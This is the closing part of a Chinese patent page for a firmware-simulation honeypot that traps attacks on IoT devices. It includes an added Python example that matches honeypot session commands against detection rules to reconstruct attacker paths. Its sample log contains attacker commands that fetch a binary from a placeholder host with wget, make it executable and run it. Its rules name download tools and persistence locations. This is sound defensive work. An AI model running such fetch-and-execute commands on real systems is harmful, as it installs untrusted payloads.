step 4-2: monitoring the access traffic of the device in the honeypot in real time and synchronously comparing certain key data against the database;
step 4-3: combining the analysis results of step 4-1 and step 4-2 to derive the attack behaviors suffered by devices of different types and models and the paths taken by attackers, studying corresponding solutions from the perspective of the system, improving the system's capability to defend against various attack behaviors, and constructing a safer and more reliable system security protection system.
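The capture stage of claim 5 (and of step 4-3 in the description) compares key data from honeypot sessions against the feature database of step 4-1 and reconstructs each attacker's path. The following added example, not part of the patent, does this over a constructed JSON-lines event stream; the event format, the four detection rules, the brute-force threshold and the TEST-NET addresses are all assumptions standing in for a real honeypot's output and a real vulnerability table.

```python
import json
import re
from collections import defaultdict

# Constructed feature database standing in for the step 4-1 vulnerability table:
# (pattern over the attacker's command, attack class).
FEATURE_DB = [
    (re.compile(r"\b(uname|cat /proc/cpuinfo)\b"), "device fingerprinting"),
    (re.compile(r"\b(wget|curl|tftp)\b"), "payload download"),
    (re.compile(r"\bchmod (\+x|777)\b"), "payload staging"),
    (re.compile(r"(/etc/init\.d/|crontab|rc\.local)"), "persistence"),
]
BRUTE_FORCE_THRESHOLD = 3  # failed logins from one source before it is flagged

# Constructed honeypot event stream (JSON lines, documentation-range addresses).
SAMPLE_LOG = """\
{"ts": "2021-02-26T10:00:01", "src": "198.51.100.7", "event": "login.failed", "user": "root"}
{"ts": "2021-02-26T10:00:03", "src": "198.51.100.7", "event": "login.failed", "user": "admin"}
{"ts": "2021-02-26T10:00:05", "src": "198.51.100.7", "event": "login.failed", "user": "root"}
{"ts": "2021-02-26T10:00:07", "src": "198.51.100.7", "event": "login.success", "user": "root"}
{"ts": "2021-02-26T10:00:09", "src": "198.51.100.7", "event": "command.input", "input": "cat /proc/cpuinfo; uname -a"}
{"ts": "2021-02-26T10:00:12", "src": "198.51.100.7", "event": "command.input", "input": "wget http://203.0.113.9/x.mips -O /tmp/x"}
{"ts": "2021-02-26T10:00:15", "src": "198.51.100.7", "event": "command.input", "input": "chmod +x /tmp/x; /tmp/x"}
{"ts": "2021-02-26T10:02:40", "src": "203.0.113.50", "event": "login.failed", "user": "admin"}
{"ts": "2021-02-26T10:02:44", "src": "203.0.113.50", "event": "login.success", "user": "admin"}
{"ts": "2021-02-26T10:02:50", "src": "203.0.113.50", "event": "command.input", "input": "uname -m"}
"""

def classify(command: str) -> list[str]:
    """Synchronous comparison of one key datum (the command) against the feature DB."""
    return [cls for rx, cls in FEATURE_DB if rx.search(command)]

def analyse(log_text: str) -> dict:
    """Per-source view: failed-login count, brute-force flag and the attacker's path
    (attack classes in first-seen order), i.e. the material step 4-3 combines."""
    sessions = defaultdict(lambda: {"failed_logins": 0, "path": []})
    for line in log_text.splitlines():
        ev = json.loads(line)
        s = sessions[ev["src"]]
        if ev["event"] == "login.failed":
            s["failed_logins"] += 1
        elif ev["event"] == "command.input":
            for cls in classify(ev["input"]):
                if cls not in s["path"]:
                    s["path"].append(cls)
    for s in sessions.values():
        s["brute_force"] = s["failed_logins"] >= BRUTE_FORCE_THRESHOLD
    return dict(sessions)
```

The persistence rule is deliberately left unmatched by the sample so that the output distinguishes a session that fingerprints the emulated device from one that goes on to stage a payload.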
Application CN202011393227.9A, priority date 2020-12-03, filing date 2020-12-03: Attack trapping system based on firmware simulation (Withdrawn; publication CN112417444A (en))

Publications (1)

Publication Number Publication Date
CN112417444A true CN112417444A (en) 2021-02-26

Family

ID=74829800

Cited By (12)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN113703920A (en) * 2021-08-27 2021-11-26 烽火通信科技股份有限公司 Hardware simulation method and platform
CN113703920B (en) * 2021-08-27 2023-08-08 烽火通信科技股份有限公司 Hardware simulation method and platform
CN114157450A (en) * 2021-11-04 2022-03-08 南方电网深圳数字电网研究院有限公司 Internet of things honeypot-based network attack induction method and device
CN114157450B (en) * 2021-11-04 2024-03-15 南方电网数字平台科技(广东)有限公司 Internet of things honeypot-based network attack induction method and device
CN113965409A (en) * 2021-11-15 2022-01-21 北京天融信网络安全技术有限公司 Network trapping method and device, electronic equipment and storage medium
CN114756871A (en) * 2022-04-22 2022-07-15 Oppo广东移动通信有限公司 Vulnerability detection method and device, electronic equipment and storage medium
CN114884717A (en) * 2022-04-28 2022-08-09 浙江大学 User data deep evidence obtaining analysis method and system for Internet of things equipment
CN114884717B (en) * 2022-04-28 2023-08-25 浙江大学 User data deep evidence collection analysis method and system for Internet of things equipment
CN114826996A (en) * 2022-05-10 2022-07-29 上海磐御网络科技有限公司 Router honeypot testing method and device based on busy file system
CN115664855A (en) * 2022-12-22 2023-01-31 北京市大数据中心 Network attack defense method, electronic equipment and computer readable medium
CN116502226A (en) * 2023-06-27 2023-07-28 浙江大学 Firmware simulation-based high-interaction Internet of things honeypot deployment method and system
CN116502226B (en) * 2023-06-27 2023-09-08 浙江大学 Firmware simulation-based high-interaction Internet of things honeypot deployment method and system

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
WW01 Invention patent application withdrawn after publication Application publication date: 20210226